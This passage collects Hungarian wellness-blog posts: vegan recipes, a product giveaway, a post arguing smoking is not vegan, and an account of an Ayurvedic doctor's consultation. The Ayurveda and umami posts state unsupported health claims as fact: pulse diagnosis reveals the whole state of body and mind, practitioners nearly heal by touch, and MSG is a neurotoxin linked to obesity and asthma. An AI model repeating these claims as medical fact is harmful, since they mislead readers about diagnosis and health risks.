fűszerekkel ellensúlyozni. Erre az ájurvéda nagyon sok ajánlást ad. Pl. koffeinhez, ha kardamomot vagy szerecsendióport használsz ellensúlyozhatod a kedvezőtlen hatásait. A joghurt okozta nyálkatermelés ellensúlyozásához érdemes a joghurtot gyömbérrel fogyasztani. Soha ne légy kényszeres vagy flusztrált az ételek vagy étkezések miatt. Az étkezésnél fontos, hogy örömet okozzon. Alkalmanként egy-egy nem annyira megfelelő ételkombináció elfogyasztása nem fog különösebb problémákat okozni. Amennyiben olyan ételkombinációt szeretnél enni, amit nehezebb megemészteni, célszerű ebédre időzítened a fogyasztását, mert ilyenkor a legerősebb az emésztésed tüze . Lassan fokozatosan, lépésről, lépésre kezd el átalakítani az étkezésedet, mert a drasztikus változtatások, tiltások sosem vezetnek jó eredménye. Az ájurvéda soha nem szélsőséges, mindig figyelembe veszi az egyéni adottságaidat és bármilyen változtatásban a fokozatosságot tartja a legfontosabbnak. Pl. elsőre próbáld bevezetni, hogy a gyümölcsöket csak magában fogyasztod. Majd haladj fokozatosan az egyes ételkombinációk figyelembe vételével. Jó emésztőerőt kívánok:) szeretettel: Kati felhasznált szakirodalom: dr. vasant Lad és Usha Lad Ájurvéda szakácskönyve
Planetbio nyereményjáték
2016. június 10. Zizi kalandjai
A Planetbio kiváló termékeit már jó ideje használom és pár receptet is megosztottam, amelyekben előfordulnak az általuk forgalmazott szuper élelmiszerek.
Nyeremény : felajánlásuknak köszönhetően egy szerencsés játékos nyerhet egy általa választott szuper élelmiszert a webshopjukból és Julie Morris: Superfood Smoothie című könyvével (Édesvíz Kiadó) is gazdagabb lesz.
Írjátok meg ide a bejegyzés alá kommentben (az email címetekkel együtt), hogy nektek melyik a kedvenc szuperélelmiszeretek, amit választanátok a webshopból! Egy csomag vasban gazdag lucuma vagy goji, esetleg egy 100% higanymentes spirulina, netán egy mennyei E vitamindús kakaóvaj?
+ Aki játszik és nem nyer, annak a játék után lesz meglepetésünk!
Szabályok : a játék időtartama 2016. június 10 – június 15-ig tart. Sorsolás a random.org-gal. Eredményhirdetés 2016. június 16-án. A nyertest emailben fogom értesíteni, majd a neve kikerül a blogra (ez a bejegyzés fog frissülni). A nyereményt a nyertesnek a Planetbio Magyaroszág postázza magyarországi címre.
Bulgursaláta avagy tabbouleh másképp
Ismeritek a bulgurt? Ez nem egy gabona fajta, hanem párolt/gőzölt, majd napon szárított durumbúza töret. A közel-keleti és török konyha kedvelt étele. Ha gyors köretre van szükség, akkor ez mindenképp jusson eszedbe. Édes és sós ételekhez is remekül passzol. Hasonlít a rizshez, de kicsit pergősebb az állaga. Nagyon jól átveszi az ízeket, ezért népszerűek a bulgurból készült saláták, zöldséggel és sok-sok zöldfűszerrel. Glutént tartalmaz. Annyira jó szakítani a hagyományos rizs-krumpli-tészta párostól, hiszen olyan sok csodás alapanyag van, amit nem fogyasztunk a mindennapokban. Bár a bulgur már kezd bekúszni egyes iskolai menzákra, a tarhonyát helyettesítik vele. Bár a lányaim még nem találkoztak vele. Nos, ez a saláta igazán gyors, frissítő és finom. Tökéletes köretnek, de önmagában, vacsorára is elég. A hagyományos tabbouleh-től egy kissé eltér, mert nem tettem bele uborkát és mentát. Bulgurból többfélét lehet vásárolni, van apróbb szemű, amelyet elég forrázni, és vannak nagyobbak is. Én a DM-ben vettem, erre ráfért úgy 10 perces főzés, majd 10 perces párolódás. Mindenképp tapasztaljátok ki a saját bulgurjaitokat. :D, hogy mikor lesz puha. Hozzávalók: - 1 csésze bulgur - 1 kis evőkanál kókuszolaj vagy bio vaj - 2 gerezd fokhagyma - 1 lilahagyma - 1 csokor petrezselyem - 2 kemény húsú paradicsom - himalája só, bors - friss citrom leve Elkészítése: - Egy edénybe tedd bele a kókuszolajat vagy a vajat és öntsd hozzá a bulgurt. Reszeld bele a fokhagymát. 1-2 perces összeforgatás után adj hozzá 2 csésze vizet. Fűszerezd. - Forrald fel, majd lassú lángon (lefedve) 10 perc alatt főzd meg. Vedd le a tűzről, és hagyd még lefedve úgy 10 percig. - Lazán forgasd át egy villával. - A lilahagymát én vékony csíkokra vágtam (de kockázhatod is), a paradicsomot pedig kis kockára. A petrezselymet is vágd apróra. - Mindent keverj a bulgurhoz, locsold meg pici citromlével.
Paprikás hummus, azaz csicseriborsókrém recept – vegán
A hummusz azért jó, mert a fő hozzávalói nem romlandóak, simán be lehet tárazni belőlük, és ráadásul jól variálható étel. Ha mindig tartasz otthon két konzerv csicseriborsót (vagy egy nagyot), akkor bármikor rögtönözhetsz egy fincsi mártogatóst, vagy szendvicskrémet. A hagyományos receptben a csicseriborsón kívül tahini (szezámkrém), citromlé, bors, római kömény, só és olívaolaj van. Ezek közül néhányat most kihagytam, és egy másik ízvilágot alkottam meg. Hozzávalók (nagy adag): 2 konzerv csicseriborsó 1 gerezd fokhagyma 3 nagy evőkanál ajvár (édeskés szendvicskrém paprikából, nem keverendő az Erős Pistával vagy az Édes Annával) 1 evőkanál Édes Anna, vagy más, sós paprikakrém koriandermag római kömény növényi olaj (napraforgó-, szezámmag-, olvasztott kókusz- vagy olívaolaj, opcionális) A két konzervet kinyitjuk, és leöntjük a levét egy tálba. Fontos, hogy ne öntsd ki, mert ezzel a lével fogjuk beállítani a krémességet. A hozzávalókat és kb. fél deci csicseriborsólevet egy tálba teszünk és botmixer segítségével elkezdjük szétdolgozni. Itt már lehet látni, mennyire sűrű a krém. Én körülbelül arckrém sűrűségűen szeretem, ilyenkor jól kenhető, tunkolható, és finom a textúrája a szájban. Ha hígabbra készítjük, saláta tetejére is tehetjük öntetként. Ha mártogatjuk, cuki tálkákban tálaljuk, friss fűszerrel, például korianderrel meghinthetjük a tetejét. Vigyázat, sokan utálják a koriander levelét, így ha vendégeket várunk, talán nem ez a legjobb választás. A bazsalikom és a snidling is jól passzol hozzá. Gyárthatunk miniszendvicseket is, vállalkozó kedvűek még tésztaszószként is kipróbálhatják. The post Paprikás hummus, azaz csicseriborsókrém recept – vegán appeared first on VegaNinja.
Ájurvédikus orvosi konzultáció - mi történik egy ájurvéda orvosi vizsgálaton
2016. május 28. Élj harmóniában
Az ájurvédáról már többször írtam és mindig fontos kihangsúlyozni, hogy ez nem csak valamiféle gyógyítás vagy életmódjavaslat. Az ájruvéda a testi-lelki harmónia és egészségmegőrzés komplex, csodálatos rendszere. Elsődlegesen nem a betegségek gyógyítása a cél, hanem már a legkisebb egyensúlytalanságok érzékelése és helyreállítása és ilyenformán a prevención van a hangsúly. Akármennyire is odafigyelünk az életmódunkra, egészségünkre mindenkinél előfordulnak kisebb nagyobb egyensúlytalanságok, melyeket ha időben kiegyensúlyozottá teszünk, akkor semmilyen probléma nem fogja felütni a fejét, nem lesz betegség, nem alakulnak ki komolyabb tünetek. A nyugati orvoslás olyankor kezd el foglalkozni az emberek állapotával, amikor kialakult már egy konkrét betegség és azt próbálja kezelni. Az ájurvédikus orvosok csodája abban rejlik, hogy már a legkisebb egyensúlytalanságokat is képesek a testedben és az elmédben érzékelni - olyasmiket is, amiket sem Te, sem a nyugati orvoslás még nem venne észre - és megfelelő életmódbeli, táplálkozási változtatásokkal, gyógynövény készítményekkel helyre tudják állítani testi-lelki egyensúlyod és megelőzheted a betegségek kialakulását. Számos ájurvédikus terápiát, kezelést Te magadnak otthon el tudsz végezni - korábban pl írtam már egyszerűbb otthoni méregtelenítő kúráról itt olvashatsz róla. Bizonyos egyensúlytalanságokat tudsz érzékelni és időben megfelelő étrendi, életmódi változtatásokat alkalmazva megelőzheted a betegségeket. Most arról szeretnék írni, ha egy hiteles ájurvéda orvoshoz elmész, akkor mire számíthatsz. Magam részéről a Mahrasihi Ájurvéda nagy híve vagyok 15 éve, szerencsére az elmúlt időszakban egy nagy tudású, kedves Maharshi ájruvéda orvos félévente jön Magyarországra, így volt már több körben lehetőségem elmenni hozzá konzultációra. A Maharishi orvosok hatalmas szaktudással rendelkeznek, magasan képzettek és a Maharishi Ájurvéda készítményei nagyon magas (gyógyszerészeti) minőségűek - jómagam 15 éve csak ezeket a készítményeket használom. Először is fontos azt is tudni, hogy az ájurvéda orvosok és ájurvéda terapeuták, kezelők, masszőrök eltérő szinten vannak. Az orvosok, nagyon színvonalas egyetemi képzéssel és diplomával rendelkeznek, nagyon széles körű a tudásuk és a szakmai tapasztalatuk. Nagyon fontos ismérve egy ájurvédikus orvosnak, hogy nem csak kiváló tudása van, de kiegyensúlyozott és testileg, szellemileg is magas fokú tisztaság jellemzi. Ők diagnosztizálnak, terápiákat írnak elő és szinte már az érintésükkel gyógyítanak:) A terapeuták, kezelők, masszőrök az adott feladatukhoz kapcsolódóan végeztek csak képzést - nem rendelkeznek olyan széles körű ismeretekkel és az ájurvédikus orvos irányítása alatt végrehajtják az előírt terápiákat - ők nem írhatják elő, nem diagnosztizálhatnak. Náluk is fontos, hogy szellemi és testi szinten is tiszta személyek legyenek. Óvakodj attól, hogy önjelölt ájurvédikus gyógyítókhoz menj, mert a nem megfelelően beállított terápia, még ártalmas is lehet mind a testedre, mind az elmédre nézve. Először is készülj fel a konzultációra. Gondold végig a tüneteidet, betegségeidet, hogy a problémáidat majd át tudd beszélni az orvossal. Egy ájurvéda orvos mindig egyénileg foglalkozik a páciensekkel. Először megnézi az alkati jellemzőket,már ahogy belépsz az ajtón. Utána a pulzusodat fogja megnézni. A pulzusdiagnosztika az ájurvéda legcsodásabb része, egy jó ájurvéda orvos anélkül, hogy bármit kérdezne Tőled a pulzusod alapján teljes képet kap, a tested és elméd állapotáról. Ilyenkor az ájurvéda orvos megállapítja a doshák egyensúlytalanságait és elmondja amit érzékel. A legtöbb esetben ő a probléma gyökerét fogja megállapítani, míg te magad leginkább a tünetek szintjén tudod csak érzékelni, ami már csak a következménye a doshák egyensúlytalanságának. Az ájurvéda konzultáción kérdéseket fogsz kapni az életmódodra, táplálkozásodra, emésztésedre, tüneteidre, problémáidra vonatkozóan. Elképzelhető, hogy az orvos megnézi a szemeidet, körmeidet, nyelvedet is. Az ájurvédikus vizsgálat teljes képet fog adni az orvosnak általános egészségügyi állapotodról vagy bármilyen fennálló betegségedről, és az esetleges egészségügyi kockázatokról. Ezek után az orvos komplett terápiát fog javasolni, melynek része lesz a táplálkozás, testmozgás, életmódbeli, napirendi dolgok továbbá ájurvédikus kezelések (masszázs, izzasztó terápiák, méregtelenítő kezelések). A gyógyító célja, hogy segítsen számodra az egészséges életmód kialakításában. Ezért elképzelhető, hogy fog komolyabb életmódbeli változásokat is javasolni. pl. kevesebb ivás, több alvás, etc. Lehet, hogy méregtelenítő kúrát kapsz és lehet, hogy, éppen egy tápláló erősítő kúrát. El fogja mondani milyen ételeket részesíts előnyben és melyek azok amiket a terápia idejére célszerű lenne mellőznöd. Ajánlásokat kapsz a napi menetrendedbe néhány apró dolog beépítésére lefekvés előtti teendők, ébredés utána tevékenységek. pl. olajos önmasszázs (részletes itt olvashatsz róla) , olajos szájöblögetés, nyelvkaparás (részletes itt olvashatsz róla), áztatott aszalt gyümölcsök, magvak, tejes italok, teák fogyasztása, etc. Amennyiben szükséges javasolni fog különböző gyógynövénykészítményeket is - néhányról már a blogon is olvashattál. A készítmények erősítik vagy éppen tisztítják a szervezetedet, elősegítik a harmónia helyreállítását, betegségek, tünetek megszüntetését és a betegségek megelőzését. Ezekhez el fogja mondani a pontos szedését is, mikor és hoygan kell a készítményeket szedni - az ájurvédában különböző vivőanyagokkal (pl. forró víz, ghí, tej) kell az egyes készítményeket szedni. Elképzelhető, hogy javasol légzőgyakorlatokat, jógagyakorlatokat vagy meditációs gyakorlatokat is. Szükség esetén komolyabb betegségeknél, javasol ájruvédikus kezeléseket is, mint méregtelenítő terápiák, izzasztó kúrák, maszsázsok, etc. illetve javasolhat komplett kórházi terápiát is. Ha már elmentél egy ájurvédikus orvosi konzultációra, érdemes az ott elhangzott javaslatokat beépíteni az életedbe, követni az útmutatásokat, ajánlásokat. Hiszen, ha nem változtatsz semmin, akkor kidobott idő és pénz a konzultáció. Milyen gyakran menj ájurvédikus orvoshoz? Sok esetben, amikor nincs semmilyen tüneted, akkor is érdemes elmenni egy ájurvédikus orvosi konzultációra, hogy fény derülhessen olyan tényezőkre, melyekből a későbbiekben betegség lehetne - pl fél évente, évente. Amennyiben van egy konkrét betegség, ott a betegség súlyosságától, a beteg állapotától és terápiától függ, hogy milyen időközönként szükséges felkeresni az ájurvédikus orvost. A kontroll vizsgáltat segít az orvosnak képet kapni arról, hogyan hat a terápia és esetlegesen hogyan kell módosítani a terápiát annak érdekében, hogy az egészséged mielőbb helyreálljon. kiváló testi-lelki egészséget kívánok:) szeretettel: Kati
Umami leves
Mi az az umami? Az umami az ötödik alapíz. Vagyis a sós, édes, savanyú, keserű és umami az az íz, amire külön receptorok vannak a nyelven, és nem az orrunkban érzékeljük, mint az ezeken kívüli ízeket mind. Az umami a telt íz, a "jó" étel íze, ami megelégedést, jóllakást vált ki.
A nátrium-glutamátot például azért fejlesztették ki, hogy ezeket a receptorokat csiklandozza. Igen, az a furcsa adalékanyag, ami önmagában színtelen és szagtalan, viszont minden étel finomabb lesz tőle. Ez a mesterséges ízfokozó kémiailag hasonlít arra a molekulára, amit keresünk, de sajnos nem azonos vele. Kapcsolatba hozták már elhízással, krónikus fejfájással, asztmával és idegméregként is emlegetik. Izé... Én maradok inkább a természetes verziójánál akkor. Mi is az ízfokozó természetes formája?
Természetes formája jellemző a húsokra, sajtokra és halakra is, de ne gondoljuk, hogy csak az állati ételekhez köthető. Sőt! Umami van még a gombában, a paradicsomban, a spenótban, a zellerben és a hagymában is. Várjunk csak! Egy umami leves rendel! Hozzávalók 2-3 adaghoz:
[...] Bővebben!
Erdei gyümölcsös quinoa
A quinoa mondhatni álgabona. Mégis, vagy éppen ezért szuperélelmiszer, aminek glikémiás indexe 44. Ez az érték a 0-55 közötti tartományba esik, ami alacsony glikémiás indexnek felel meg, így a fogyasztása nem jár jelentős vércukorszint emelkedéssel. Cukorbetegek is fogyaszthatják. Álgabona, mivel nem áll rokonságban a búzával vagy más gabonafélékkel, hiszen a paraj és céklafélék rokonságába sorolható. Gluténmentes, diétázók, fogyókúrázók számára is ajánlott. Állítólag ez az egyetlen, a növények világából származó táplálék, amelynek fehérjéi egyenértékűek a húsban találhatókkal. Ráadásul a quinoa aminosavprofilja a kazeinéhez hasonlítható. (Kazein a tehén/kecsketejben található fehérje.) Magyarországon ritkán (v)ettünk, meglehetősen drága ára van. Angliában azonban jobban elterjedt. Számtalan étterermben, munkahelyi kantinban készítenek ételt belőle. Grapetree nevü boltocskában már egy ideje tart az akciója, miszerint 1 csomag (0,5kg) áráért kettőt kapok, s így úszom meg az 1 kilos quinoat 4 font alatt. Szóval nem csak rizst és kölest lehet tejben megfőzni és sok gyümölccsel megenni. Íme, itt a tejbequinoa sok sok erdei gyümölccsel. Az édes ízhatást banánnal értem el.
A recept
Hozzávalók:
- 20 dkg quinoa
- 5 dl növényi tej (nekem szójatej volt otthon)
- 1 nagyobb bögre erdei gyümölcs (most még fagyasztott volt)
- 1-2 banán
Elkészítés:
A quinoát vastag szűrőn keresztül átmossuk, majd annyi tejben, ami jól ellepi, puhára főzzük. Ha elfőtt róla az összes tej, még adhatunk hozzá. Banánt feldaraboljuk vagy felkarikázzuk, hozzákeverjük, a fagyasztott gyümölcsöt is hozzákeverjük, lágyan, hogy ne essen szét. Csak ezután zárjuk el alatta a gázt. Tálalásig lefedjük. A fagyasztott gyümölcsök gyorsan felolvadnak a meleg tejes quinoa-ban.
Egészséges, házi készítésű "nutella" - Csokoládés kesukrém
2016. május 21. Élj harmóniában
Csokoládés kesukrémA nutella óta tudjuk, hogy a mogyoró és diófélék nagyon ízletesek édesen, csokoládés ízvilággal. Szerintem szinte nincs olyan, aki ne falatozott volna lelkesen csokoládés krémet kanállal. Sajnos a boltban kapható csokoládés krémek általában sok tartósító szert, mesterséges anyagot, ízfokozót tartalmaznak és nem túl egészségesek. Ellenben ha otthon, magadnak készítesz ilyen krémeket, akkor az nem csak finom lesz, de egészséges is.Készíthetsz csokoládés magkrémet mogyoróval, mandulával és persze a kesudió különösen édeskés ízvilágával is. Legközelebb egy pörkölt mogyorós receptet is közzé teszek a blogon. 300 g kesudió 19 0 ml víz 5 ek. kakaó por (karobot is használhatsz ) 120 ml juharszirup vagy datolyaszirup vanília Vegyszermentes (bio) alapanyagokat használj! A kesudiót áztasd be minimum 6 órára, majd öntsd le róla a vizet. Tedd a konyhai aprítóba turmixold egy kicsit, majd tedd hozzá a vízet és turmixold krémes állagúra. Tedd hozzá a kakaót, vaníliát és dolgozd jól össze. Fogyasztásig hűtőben tárolhatod. Mivel ez friss csokoládékrém néhány napon belül ne felejtsd el elfogyasztani:) Általában nem kell sokat állnia a hűtőben:)
A dohányzás nem vegán! Nem csak magadat ölöd meg vele.
Kutyák, macskák, majmok és egyéb kisállatok millióit kínozzák meg évente laboratóriumokban különböző kutatási célokkal. Az egyik ilyen cél a dohányzás mellékhatásainak kimutatása. A dohányzás nem vegán!
A dohányás nem vegán! De miért?
Biztos sokakat meglep ha azt mondom, hogy a köztudottan káros dohányzás élettani hatásait is állatokon próbálják kimutatni több, mint fél évszázada. Hogy ennek valójában mi haszna van azon kívül, hogy pénzt vesznek fel kutatócsoportok egy “jó ügyért”, még szerintem maguk sem tudják. Nem kell több diplomás orvosnak lenned ahhoz, hogy tudd, a kátránnyal teli égéstermék nem tesz jót a tüdődnek. Sem rövid, sem hosszú távon. Ergo nem értelmezhető számomra ész érvekkel, hogy miért kell állatok ezreit kínozni egy olyan információért amit mindenki tud. Ha van értelme szintekről beszélni, akkor ez a fajizmus egy igazán értelmetlen szintje. Vagy komolyan gondolja bárki, hogy akár egy életet vagy akár egy percnyi szenvedést megér azt kideríteni, hogy melyik papír, adalékanyag vagy dohánymix ártalmasabb kevésbé arra az emberre nézve, amelyik önként és dalolva szívja tüdejébe a kátrányos égésterméket? Ha nem értesz egyet ezzel, akkor ne szívj dohányt semmilyen formában, mert a dohányzás nem vegán!
A dohányzás különböző formáit érintő állatteszteken olyan dolgokra kíváncsiak, minthogy a natúr és különböző ízesített dohányok összetevőinek milyen hatásuk van a szervezetre nézve. Ehhez napi 6-8 órában lélegeztetnek be állatokkal dohányfüstöt hónapokon, éveken keresztül. Az ilyen tesztekhez használt állatoknak nincs esélyük a túlélésre, mivel a tüdőben okozott elváltozásokat és az egyéb testben okozott károkat csak egy módon lehet megvizsgálni. Ezt nem taglalom tovább.
Ugyan Európa számos országában – többek között Németországban és Angliában – betiltották már a dohányzással kapcsolatos állatteszteket, mégis a világ számos pontján ezt még bevált gyakorlatként kezelik. Mindezt annak ellenére, hogy minden faj teste értelemszerűen másképpen reagál a szélsőséges és káros behatásokra, így az állatkísérletek csak hozzávetőleges információval szolgálhatnak. Például a dohányzás és az emberben kialakuló tüdőrák kapcsolata évekig rejtve maradt, mivel az állatteszteken nem tudtak kimutatni kapcsolatot.
A dohányzás nem vegán, de kilátásban vannak a megoldások
A tiltások hatására számos cég igyekszik olyan alternatív megoldásokat találni, mely megfelel a szabályozásnak és erőszakmentes. Ilyen alternatív megoldásnak számít például a Philip Morris európai törekvése arra vonatkozólag, hogy emberi tüdőszöveteken teszteljenek. Azonban ez csak Európára és pár országra vonatkozik. Mivel Amerikában még nem tiltják az ilyen jellegű állatkísérleteket, így ott töretlenül folytatják a megbízhatatlan eredményekkel kecsegtető és lényegében értelmetlen kutatásokat. Ebből kiindulva a dohányzás a legtöbb cég esetében nem vegán, még ezekkel az európai szabályozásokkal sem.
Többek között a PETA állatvédő szervezet törekvéseinek és a vezetők időleges belátásának köszönhetőek az európai szabályozások, melyek hamarosan remélhetőleg világszerte elterjednek.
Kapcsolódó bejegyzések a PETA és a PCRM oldalain.
Vaníliás-epres chiapuding
Akiknek gyereke van, azok tudják, hogy mindig kell valami édesség. :) Persze, a boltban is lehet vásárolni, de ha jót akarunk adni gyermekünknek, akkor érdemesebb magunk készíteni. Sokszor időhiányban szenvedek :), ilyenkor jó szolgálatot tesz a chiamag. Remek puding készíthető belőle, az előkészület pedig mindössze 3-5 perc. Hozzávalók: - 2,5 dl kókusztej - 2,5 dl kókuszkrém - 1 banán - 3 szem datolya - fél rúd vanília - 4 evőkanál chiamag Elkészítése: - A kókusztejet és a krémet öntsük egy olyan edénybe, amelyben tudunk botmixerezni. Tegyük bele a puha datolyát és a banánt is. Dolgozzuk smoothie állagúra. Már így is finom, akár meg is iható. :)Tedd bele a chiamagot, jól keverd össze és tedd be a hűtőbe. Nyugodtan el is feledkezhetsz róla, de minimum 1 órát hagyd duzzadni a piciny magocskákat. Egy pohárba gyümölccsel rétegezd.
Quinoás müzli szelet csokiöntettel
Valami édességre vágytak a lányaim. Ilyenkor szétnézek a kamra mélyén, hogy milyen alapanyagokat tudnék felhasználni. Igazán finom müzli lett belőle, bár legközelebb teszek bele úgy 2 evőkanál darált arany lenmagot. De egy reszelt almával is megér egy próbát. :) A hűtőben jó az állaga, de szobahőmérsékleten kicsit morzsálódik. De csak ennyi baj legyen... így is elfogyott. :) Hozzávalók: - 20 dkg aprószemű zabpehely - 5 dkg zabliszt - csipet himalája só - 1/2 mokkáskanál vaníliapor (vagy fél rúd vanília kikapart belseje) - 10 dkg datolya - 1 banán - 10 dkg kókuszolaj - 10 dkg dió - 4 dkg puffasztott quinoa - 1/2 bio narancs reszelt héja (vagy 4-5 csepp narancsolaj) - 1 kisebb narancs leve Csokiöntet - nyers csokijó krémesre darált kesudió (vagy 1 evőkanál kesudiókrém), de mogyorókrémmel is el tudom képzelni :) Elkészítése: Először is melegítsük elő a sütőt, úgy 180C fokra. Egy tálban keverjük össze a zabpelyhet, a lisztet, a sót és a vaníliát.Tegyük aprítógépbe) a puha datolyát, a banánt és az olvasztott kókuszzsírt. Nyomjuk bele a narancs levét is. Pürésítsük simára. Öntsük ezt a keveréket a száraz hozzávalókhoz. Adjuk hozzá az aprított diót és puffasztott quinoát. Reszeljük bele a narancs héját is.Jól keverjük el. Öntsük bele a müzli keveréket a sütőformába, majd kézzel alaposan nyomkodjuk bele a formába. Süssük 180C fokon 20-25 percig, amíg aranybarna lesz a teteje, a széle kicsit megpirul.
Vendégvárásra fel! Füstölt kesukrémes cukkini hajók (gluténmentes, laktózmentes, tojásmentes, nyers vegán)
füstölt kesukrémes cukkini hajók (gluténmentes, laktózmentes, tojásmentes, nyers vegán) A tegnapi édes reggeli vagy délutáni nasi után most egy könnyedebb, nyers vegán harapnivalót hoztam nektek. Tökéletes vacsora, délutáni rágcsálnivaló, ami nálam vendégváró falatként debütált és hatalmas sikert aratott. Nagyon látványos, gyorsan elkészíthető, és - a diófélékre allergiásokat kivéve - szinte minden diétába beilleszthető. Laktózmentes, gluténmentes, tojásmentes, nyers vegán cukkini hajók, telis-tele értékes tápanyagokkal, melyek a hőkezelés hiánya miatt egy az egyben a testünket táplálják. Vitaminok, ásványi anyagok, nyomelemek, rostok, energia, frissesség. Egy dublini magyar találkozóra készítettem el először ezeket a dekoratív vendégvárókat, ahol mindenki nagyon elégedett volt velük. Hamarosan egy nagyobb rendezvényre is behajózok a cukkinikkel, hogy két program között felfrissítsük a látogatókat néhány "élő", nyers vegán és vegán harapnivalóval. Tavaly már hoztam nektek a Zöld Avocado vegetáriánus gasztroblogon egy töltött cukkini hajó receptet. Rengeteg féle töltelékkel elkészíthetjük a cukkinit. Fogyaszthatjuk őket akár hidegen a forró, nyári napok hűsítő, felfrissüléseként vagy sütve, melegen a hűvős, téli napokon. Egy ilyen sült cukkini hajó receptet itt láthattok. füstölt kesukrém (nyers vegán)A cukkinibe töltött krém önállóan is nagyszerűen megállja a helyét. Aszalt krékerekhez, nyers zöldségrudakhoz mártogatósnak de akár natúr tortilla chips mellé is tökéletes kence ez a füstölt ízű kesukrém. füstölt kesukrémes cukkini hajók (gluténmentes, laktózmentes, tojásmentes, nyers vegán) HOZZÁVALÓK - 1 db nyers cukkini - 2-3 szem retek - 1 marék friss csíra (tetszés szerinti csíra) kesukrémhez: - 1 bögre natúr kesudió beáztatva éjszakára - 1 kk kurkuma - 2 kk füstölt fűszerpaprika - 1 tk Himalája só - 1/2 bögre tiszta víz - 1 ek friss, piros színű (kaliforniai) paprika - 1 ek nyers tahini szósz - 3 ek sörélesztő pehely füstölt kesukrémes cukkini hajók (gluténmentes, laktózmentes, tojásmentes, nyers vegán) ELKÉSZÍTÉSA kesukrémhez a hozzávalókat tegyük a nagy teljesítményű aprítógépünkbe és turmixoljuk egynemű krémmé. A cukkiniket mossuk meg alaposan, majd vágjuk le a fás végeit. Készítsünk cukkini hajókat úgy, hogy kettévágjuk a cukkiniket hosszában, majd keresztben is. Így 4 db cukkini hajó alapot kapunk. Egy kanál segítségével kivájjuk a cukkinik belsejét, azaz kikaparjuk belőle a puha, magos rész egy részét. Nem kell nagyon mélyen. Éppen csak, hogy bele tudjuk kanalazni a kesukrémet, és ne csússzon le a cukkinről. Miután minden cukkini hajó törzs elkészült, megtöltjük a kesukrémmel, majd tetszés szerinti méretre vágott retekkel és csírával díszítjük őket. Az így elkészült dekoratív cukkini hajók ki is kerülhetnek a vendégváró asztalra. Egy nagy és éles késsel kb. 5 cm-es darabokra felvágva könnyedén egyszemélyes harapnivalókat kínálhatunk fel a vendégeink számára. füstölt kesukrémes cukkini hajók (gluténmentes, laktózmentes, tojásmentes, nyers vegán) TÁPLÁLKOZZ, NE CSAK ÉTKEZZ még vendégvárás közben is! :-) Megjegyzés: Készíthetjük a krémet hagyományos tahini szósszal, de akkor már nem számít nyers vegán ételnek, mert az átlagos tahiniban található szezámmag hőkezelésen esett át. Ha szeretnénk élő ételt készíteni használjunk nyers tahini krémet. füstölt kesukrémes cukkini hajók (gluténmentes, laktózmentes, tojásmentes, nyers vegán)
Epres-rebarbarás zabsüti akár reggelire is (laktózmentes, gluténmentes, tojásmentes, vegán)
Mostanában nem sok időm volt a blogra. Ne haragudjatok érte. Pedig a konyhám nem porosodik, és készülnek a finomabbnál finomabb, egészségtudatos ételek. Elég sok pozitív változás lesz a közeljövőben az életemben, ami majd a blogot is illeti. De addig is igyekszem bepótolni a lemaradást, és ezért ma és holnap is hozok egy-egy receptet nektek. :-) epres-rebarbarás zabsüti (laktózmentes, gluténmentes, tojásmentes, vegán) Végre itt a tavasz, ami nálam a várva várt eper szezon és pár éve már rebarbara szezon is. Imádom mindkettőt! ;-) Itt a Zöld Avocado vegetáriánus gasztroblogon beavattalak már titeket egy nagyon egyszerű, tápláló, vitaminban gazdag és ízletes, epres, nyers vegán pohárkrém elkészítésének a rejtelmeibe, illetve készült már nagyon epres-nagyon mákos tortácska és még a kezdetekkor egy nagyon egyszerű epres torta is (ezen most már nevetek). A tavalyi évben együtt elkészítettük ezeket a mennyei rebarbara-narancs lekváros, diós, vegán, gluténmentes muffinokat. Mondanom sem kell, hogy azóta kb. ezerszer elkészültek itthon, és már számos barátom és ismerősöm is belépett a rebarbara kedvelők táborába ezeknek a muffinoknak a hatására. Ha te még nem kóstoltad őket, ne habozz kipróbálni! ;-) eper és rebarbara Az eper és rebarbara idei megjelenésével azonnal rávetettem magam ezekre a tavaszi ízekre. Mostanában ritkán eszünk süteményeket, de az édes reggeliket szívesen fogyasztjuk. Nagy kedvenc a zab, különböző formákban elkészítve. A zab tökéletes reggelire, mert tápanyagban gazdag, lassan felszívódó szénhidrátforrás, mely hosszú órákra biztosítja a jóllakottság érzést. És nem csak az "érzést", de a tápanyagokat is. Az emésztésünkre is jó hatással van, és számtalan formában elkészíthető. Például kásaként így vagy energiaszeletként így. Ezen jótékony hatásainak hála mosolygósan indulhat a napunk. :-) Az eper - rebarbara párosból és az igényből, hogy valami zabos reggeli készüljön belőle, megszületett ez az abbahagyhatatlanul finom epres-rebarbarás zabsüti. Laktózmentes, gluténmentes, tojásmentes, vegán, reform és a megfelelő édesítőszert használva még diétásnak is mondanám. Önmagában a zab gluténmentes gabona, de egyes gluténérzékeny gyomrokban érzékenységi reakciókat válthat ki. A gluténmentes étrenden élők csoportja két táborra oszlik zab szempontból. Egyik részük fogyaszthat szigorúan gluténmentes zabpelyhet, a másik csoportjuk nem. Mindenki ki-ki maga döntse el, hogy mit szól hozzá az ő teste? Mert mint azt már jól tudjuk, soha ne másra hallgassunk, hanem csakis magunkra. Minden szervezet más, így a testünk az egyetlen, aki tudja, mi kell neki! Hallgass a tested jelzéseire, ne mások véleményére! ;-) A receptet ezen az oldalon láttam meg először, és egy kis módosítással ez lett belőle! Fogadjátok sok szeretettel! :-) Nálunk nagy kedvenc lett, és mindig szomorúan kapargatjuk a tányért, miután elfogyott... epres-rebarbarás zabsüti (laktózmentes, gluténmentes, tojásmentes, vegán) HOZZÁVALÓK (4 személyre) tésztához: - 80 g kókuszcukor (egyéb tetszés szerinti édesítőszer) - 150 g kókuszzsír (puha, de nem folyós állagra felolvasztva pl.: a napon) - 100 g (barna) rizsliszt - 1 db bio citrom reszelt héja (kezeletlen héjú) - 200 g darált zabpehely (szigorúan gluténmentes az arra érzékenyeknek) - 50 ml tetszés szerinti növényi tej (pl.: mandulatej, rizstej stb.) - csipet Himalája só - csipet őrölt szegfűszeg, 1 kk őrölt fahéj "krémhez": - kb. 300 g friss eper - kb. 300 g friss rebarbara - 70 g kókuszcukor (egyéb tetszés szerinti édesítőszer) epres-rebarbarás zabsüti (laktózmentes, gluténmentes, tojásmentes, vegán) ELKÉSZÍTÉS Daráljuk le a zabpelyhet a kávédarálón. Adjuk hozzá a rizslisztet, a kókuszcukrot, a fűszereket, a reszelt citrom héját és puha kókuszzsírt. Gyúrjuk össze kézzel az egészet egy nagy gombóccá. Úgy tűnhet, hogy szétesik, de ne adjuk fel, gyúrmázzunk csak, és meglesz az a gombóc. Ezután hagyjuk állni 30 percet. Közben a rebarbarát 